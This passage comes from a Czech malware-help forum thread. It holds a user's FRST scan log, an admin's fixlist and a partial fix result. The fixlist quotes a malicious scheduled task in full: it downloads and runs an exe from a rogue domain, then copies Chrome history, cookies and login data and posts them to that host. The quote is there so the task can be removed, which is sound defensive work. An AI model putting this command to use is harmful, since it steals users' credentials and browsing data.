ATK Generic Function Service (HKLM-x32\...\{D3D54F3E-C5C3-443D-978F-87A72E5616E8}) (Version: 1.00.0008 - ATK)
ATK Hotkey (HKLM-x32\...\{7C05592D-424B-46CB-B505-E0013E8E75C9}) (Version: 1.0.0051 - ASUS)
ATK Media (HKLM-x32\...\{D1E5870E-E3E5-4475-98A6-ADD614524ADF}) (Version: 2.0.0005 - ASUS)
ATKOSD2 (HKLM-x32\...\{3B05F2FB-745B-4012-ADF2-439F36B2E70B}) (Version: 7.0.0005 - ASUS)
Canon MP250 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MP250_series) (Version: - Canon Inc.)
ETDWare PS/2-x64 7.0.5.5_WHQL (HKLM\...\Elantech) (Version: - )
Fast Boot (HKLM\...\{13F4A7F3-EABC-4261-AF6B-1317777F0755}) (Version: 1.0.3 - ASUS)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 95.0.4638.54 - Google LLC)
Google Chrome (HKU\S-1-5-21-1878501408-2484808434-785971923-1000\...\Google Chrome) (Version: 95.0.4638.54 - Google LLC)
Choice Guard (HKLM-x32\...\{8FFC5648-FAF8-43A3-BC8F-42BA1E275C4E}) (Version: 1.2.87.0 - Microsoft Corporation) Hidden
Intel(R) Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: - Intel Corporation)
Junk Mail filter update (HKLM-x32\...\{4AB8B41B-3AF1-46BE-99B0-0ACD3B300C0A}) (Version: 14.0.8050.1202 - Microsoft Corporation) Hidden
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Office Live Add-in 1.3 (HKLM-x32\...\{57F0ED40-8F11-41AA-B926-4A66D0D1A9CC}) (Version: 2.0.2313.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Sync Framework Runtime Native v1.0 (x86) (HKLM-x32\...\{8A74E887-8F0F-4017-AF53-CBA42211AAA5}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Sync Framework Services Native v1.0 (x86) (HKLM-x32\...\{BD64AF4A-8C80-4152-AD77-FCDDF05208AB}) (Version: 1.0.1215.0 - Microsoft Corporation)
Nástroj pro odesílání služby Windows Live (HKLM-x32\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
Trend Micro Internet Security (HKLM\...\{718D791F-F4E8-4aa7-98A6-15FDED17BDD0}) (Version: 17.50 - Trend Micro Inc.)
Trend Micro Internet Security (HKLM\...\{9D2B0322-44AE-460E-9283-4D2D7A9205AE}) (Version: 17.50 - Trend Micro Inc.) Hidden
USB 2.0 1.3M UVC WebCam (HKLM\...\USB 2.0 1.3M UVC WebCam) (Version: - )
VIA Platform Device Manager (HKLM-x32\...\InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.34 - VIA Technologies, Inc.)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite_Wave3) (Version: 14.0.8050.1202 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{4B4451CE-D1E6-4BDE-B4B2-59F03BB83B7C}) (Version: 14.0.8050.1202 - Microsoft Corporation)
WinFlash (HKLM-x32\...\{8F21291E-0444-4B1D-B9F9-4370A73E346D}) (Version: 2.26.0 - ASUS)
WinRAR 6.02 (64-bit) (HKLM\...\WinRAR archiver) (Version: 6.02.0 - win.rar GmbH)
Wireless Console 3 (HKLM-x32\...\{20FDF948-C8ED-4543-A539-F7F4AEF5AFA2}) (Version: 3.0.10 - ASUS)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{041F9391-C79D-44EE-AA4E-AF4E029C4B47}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\psuser_64.dll (Google LLC -> Google LLC)
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{85D8EE2F-794F-41F0-BB03-49D56A23BEF4}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\psuser_64.dll (Google LLC -> Google LLC)
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{8B480070-D37D-4090-A063-7A429F849652}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.92\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{A2C6CB58-C076-425C-ACB7-6D19D64428CD}\localserver32 -> C:\Users\PC\AppData\Local\Google\Chrome\Application\95.0.4638.54\notification_helper.exe (Google LLC -> Google LLC) [File not signed]
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{BE5C2E39-090F-46A2-AFAA-47540743B4FE}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.102\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{CA8FA699-91CD-412F-9D13-9B1222F4370E}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.82\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{DEDF773D-E27B-485E-8E7D-85C5B0EB5A67}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.72\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\psuser_64.dll (Google LLC -> Google LLC)
ShellExecuteHooks-x32: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2210608 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2021-06-11] (win.rar GmbH -> Alexander Roshal) [File not signed]
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2021-06-11] (win.rar GmbH -> Alexander Roshal) [File not signed]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2009-07-03] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2021-06-11] (win.rar GmbH -> Alexander Roshal) [File not signed]
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2021-06-11] (win.rar GmbH -> Alexander Roshal) [File not signed]

==================== Codecs (Whitelisted) ====================

==================== Shortcuts & WMI ========================

==================== Loaded Modules (Whitelisted) =============

2009-10-06 11:31 - 2009-05-07 10:53 - 000379392 _____ () [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\Dts2ApoApi64.dll
2009-10-06 11:31 - 2009-05-07 10:51 - 000071680 _____ () [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\QsApoApi64.dll
2009-10-06 11:31 - 2009-07-06 08:37 - 047601664 _____ () [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\Skin.dll
2009-10-06 11:31 - 2008-01-18 08:49 - 000098816 _____ () [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VMicApi.dll
2009-10-06 11:31 - 2007-03-10 03:58 - 000124416 _____ () [File not signed] C:\Program Files\ATKGFNEX\AGFNEX64.dll
2009-05-05 19:00 - 2009-05-05 19:00 - 000041472 _____ () [File not signed] C:\Program Files\P4G\DevMng.dll
2009-07-27 19:12 - 2009-07-27 19:12 - 000026624 _____ () [File not signed] C:\Program Files\P4G\OvrClk.dll
2009-10-06 11:33 - 2009-06-22 22:37 - 000212992 _____ () [File not signed] C:\Windows\SysWOW64\Fast Boot\GetBootTime.dll
2004-05-28 03:13 - 2004-05-28 03:13 - 000080384 _____ (ACTIONTEC Electronics,Inc) [File not signed] C:\Program Files (x86)\ASUS\Wireless Console 3\ATKWLIOC.DLL
2008-06-10 19:35 - 2008-06-10 19:35 - 000049152 _____ (ASUS) [File not signed] C:\Program Files (x86)\ASUS\ATK Media\ATKMETHOD.dll
2005-09-22 02:30 - 2005-09-22 02:30 - 000036864 _____ (ATK) [File not signed] C:\Program Files (x86)\ASUS\Wireless Console 3\inter_f2.dll
2009-08-22 11:02 - 2009-08-22 11:02 - 001652736 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Trend Micro\Internet Security\MFC80U.DLL
2005-01-13 09:36 - 2005-01-13 09:36 - 000303104 _____ (Silicon Integrated Systems Corp.) [File not signed] C:\Program Files (x86)\ASUS\Wireless Console 3\SiSPkt.dll

==================== Alternate Data Streams (Whitelisted) ========

==================== Safe Mode (Whitelisted) ==================

==================== Association (Whitelisted) =================

==================== Internet Explorer (Version 8) (Whitelisted) ==========

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp//go.microsoft.com/fwlink/?LinkId=69157
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp//go.microsoft.com/fwlink/?LinkId=69157
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp//go.microsoft.com/fwlink/?LinkId=69157
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp//go.microsoft.com/fwlink/?LinkId=69157
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp//asus.msn.com
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp//go.microsoft.com/fwlink/?LinkId=54896
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp//asus.msn.com
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&src ... ORM=IE8SRC
SearchScopes: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&src ... ORM=IE8SRC
BHO: Windows Live Family Safety Browser Helper Class -> {4f3ed5cd-0726-42a9-87f5-d13f3d2976ac} -> C:\Program Files\Windows Live\Family Safety\fssbho.dll [2008-12-08] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2009-02-27] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
BHO-x32: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\SearchHelper.dll [2008-12-04] (Microsoft Corporation -> Microsoft Corp.)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Pomocník pro přihlášení ke službě Windows Live -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2008-11-18] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Windows Live Toolbar Helper -> {E15A8DC0-8516-42A1-81EA-DC94EC1ACF10} -> C:\Program Files (x86)\Windows Live\Toolbar\wltcore.dll [2008-12-08] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll [2008-12-02] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll [2008-12-02] (Microsoft Corporation -> Microsoft Corporation)
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-14 04:34 - 2009-06-10 23:00 - 000000824 _____ C:\Windows\system32\drivers\etc\hosts

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1878501408-2484808434-785971923-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\PC\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 78.157.167.7 - 78.157.167.57
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{AD1925B9-10F2-4E15-B702-45B687BF9C5D}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{DDC37A15-CF76-4EE2-AC69-8F450DF3E551}] => (Allow) C:\Windows\system32\svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{6AE3529A-4DCD-488F-9D52-F549C33A7685}] => (Allow) C:\Program Files (x86)\Windows Live\Sync\WindowsLiveSync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{A5FEFD13-E490-4420-B2FF-C2591F4D06D4}C:\users\pc\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\users\pc\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) [File not signed]
FirewallRules: [UDP Query User{6FAEB1BD-6225-4CA1-88A1-35422AEFDB14}C:\users\pc\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\users\pc\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) [File not signed]
FirewallRules: [TCP Query User{EA50643B-3BA1-42C9-8A94-29A298B813B1}C:\users\pc\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\pc\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) [File not signed]
FirewallRules: [UDP Query User{4DD63112-DB4B-45D6-B2A8-E15EB604C55D}C:\users\pc\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\pc\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC) [File not signed]
FirewallRules: [{1E472D29-7705-4C3D-846D-190DB4FA8F87}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC) [File not signed]

==================== Restore Points =========================

03-01-2021 19:32:13 Nainstalováno rozhraní DirectX
03-01-2021 19:42:38 Windows Update
05-07-2021 13:55:40 Removed 2007 Microsoft Office system
05-07-2021 14:30:59 Installed Microsoft Office Enterprise 2007
26-10-2021 17:59:44 AdwCleaner_BeforeCleaning_26/10/2021_17:59:43

==================== Faulty Device Manager Devices ============


==================== Event log errors: ========================

Application errors:
==================
Error: (10/26/2021 07:54:28 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 07:54:28 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 07:54:28 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 07:54:28 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 07:54:28 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 07:54:28 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 07:54:28 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.

Error: (10/26/2021 07:54:28 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4107) (User: )
Description: Selhala extrakce kořenového seznamu jiného výrobce ze souboru CAB pro automatickou aktualizaci v: <http://www.download.windowsupdate.com/m ... ootstl.cab>. Došlo k chybě: Certifikační řetěz byl zpracován, ale byl ukončen v kořenovém certifikátu, který nemá důvěru zprostředkovatele důvěryhodnosti.
.


System errors:
=============
Error: (10/26/2021 08:01:28 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: Server {BB6DF56B-CACE-11DC-9992-0019B93A3A84} se v daném časovém limitu neregistroval u služby DCOM.

Error: (10/26/2021 07:54:20 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 07:54:20 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 07:54:20 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: Byla přijata následující výstraha o závažné chybě: 70.

Error: (10/26/2021 06:55:42 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: Předchozí vypnutí systému (18:23:36, ‎26.‎10.‎2021) bylo neočekávané.

Error: (10/26/2021 06:00:29 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba ASLDR Service byla neočekávaně ukončena. Tento stav nastal již 1krát.

Error: (10/26/2021 06:00:29 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba ATKGFNEX Service byla neočekávaně ukončena. Tento stav nastal již 1krát.

Error: (10/26/2021 06:00:29 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba Main Service byla neočekávaně ukončena. Tento stav nastal již 1krát.


==================== Memory info ===========================

BIOS: American Megatrends Inc. 212 08/26/2009
Motherboard: ASUSTeK Computer Inc. K50IJ
Processor: Pentium(R) Dual-Core CPU T4300 @ 2.10GHz
Percentage of memory in use: 72%
Total physical RAM: 4061.09 MB
Available physical RAM: 1134.52 MB
Total Virtual: 8120.32 MB
Available Virtual: 4981.81 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:149.05 GB) (Free:110.34 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: (DATA) (Fixed) (Total:134.39 GB) (Free:65.13 GB) NTFS


==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 298.1 GB) (Disk ID: D9B3496E)
Partition 1: (Not Active) - (Size=14.6 GB) - (Type=1C)
Partition 2: (Active) - (Size=149 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=134.4 GB) - (Type=0F Extended)

==================== End of Addition.txt =======================

Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118199
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:

Re: neplatné certifikaty v prohližečích

#7 Příspěvek od Rudy »

Otevřte poznámkový blok a zkopírujte do něj:
Start

CloseProcesses:
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Task: {2C093763-EE42-49CF-8891-F189A4AB542C} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000Core => C:\Users\PC\AppData\Local\Google\Update\GoogleUpdate.exe [154440 2021-02-16] (Google LLC -> Google LLC)
Task: {326F35B1-9030-43D1-BD0D-5DBD49CECAFF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-25] (Google LLC -> Google LLC)
http://1oivviovidwopopin.info/f2/OSJPN1IXJW.exe -s -k -o "C:\Users\PC\AppData\Local\Temp\OSJPN1IXJW.exe" && cd C:\Users\PC\AppData\Local\Temp\ && "OSJPN1IXJW.exe" V04J2WGO4Hf2 DYY04N8UKN 1Q541DFWIX OEROW4YA69 & copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\History" "C:\Users\PC\AppData\Local\Temp\J1O2156BEB" > NUL && cd C:\Users\PC\AppData\Local\Temp\ && "C:\Users\PC\AppData\Local\Temp\OR0HXXB6JC.exe" -X POST -H "Content-type: application/octet-stream" --data @J1O2156BEB http://1oivviovidwopopin.info/h -> /C copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Cookies" "C:\Users\PC\AppData\Local\Temp\DYY04N8UKN" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\PC\AppData\Local\Temp\1Q541DFWIX" > NUL && copy /Y /B "C:\Users\PC\AppDa (the data entry has 678 more characters). <==== ATTENTION
Task: {74344F07-42C6-4622-9312-152A6B0AECFF} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000UA => C:\Users\PC\AppData\Local\Google\Update\GoogleUpdate.exe [154440 2021-02-16] (Google LLC -> Google LLC)
Task: {FF6375C1-1AC9-466C-80D7-F1443D3F6986} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-25] (Google LLC -> Google LLC)
U3 tmlwf; no ImagePath
U3 tmwfp; no ImagePath
C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{8B480070-D37D-4090-A063-7A429F849652}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.92\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{BE5C2E39-090F-46A2-AFAA-47540743B4FE}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.102\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{CA8FA699-91CD-412F-9D13-9B1222F4370E}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.82\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{DEDF773D-E27B-485E-8E7D-85C5B0EB5A67}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.72\psuser_64.dll => No File
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&src ... ORM=IE8SRC
SearchScopes: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&src ... ORM=IE8SRC

EmptyTemp:
End
Uložte na plochu jako fixlist.txt. Spusťte znovu FRST a klikněte na >Fix<. Po skončení akce se objeví log, který sem zkopírujte.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování:
Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.

Eddydye
Návštěvník
Návštěvník
Příspěvky: 16
Registrován: 27 kvě 2021 16:55

Re: neplatné certifikaty v prohližečích

#8 Příspěvek od Eddydye »

Fix result of Farbar Recovery Scan Tool (x64) Version: 20-10-2021
Ran by PC (26-10-2021 21:09:59) Run:1
Running from C:\Users\PC\Desktop
Loaded Profiles: PC
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start

CloseProcesses:
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Task: {2C093763-EE42-49CF-8891-F189A4AB542C} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000Core => C:\Users\PC\AppData\Local\Google\Update\GoogleUpdate.exe [154440 2021-02-16] (Google LLC -> Google LLC)
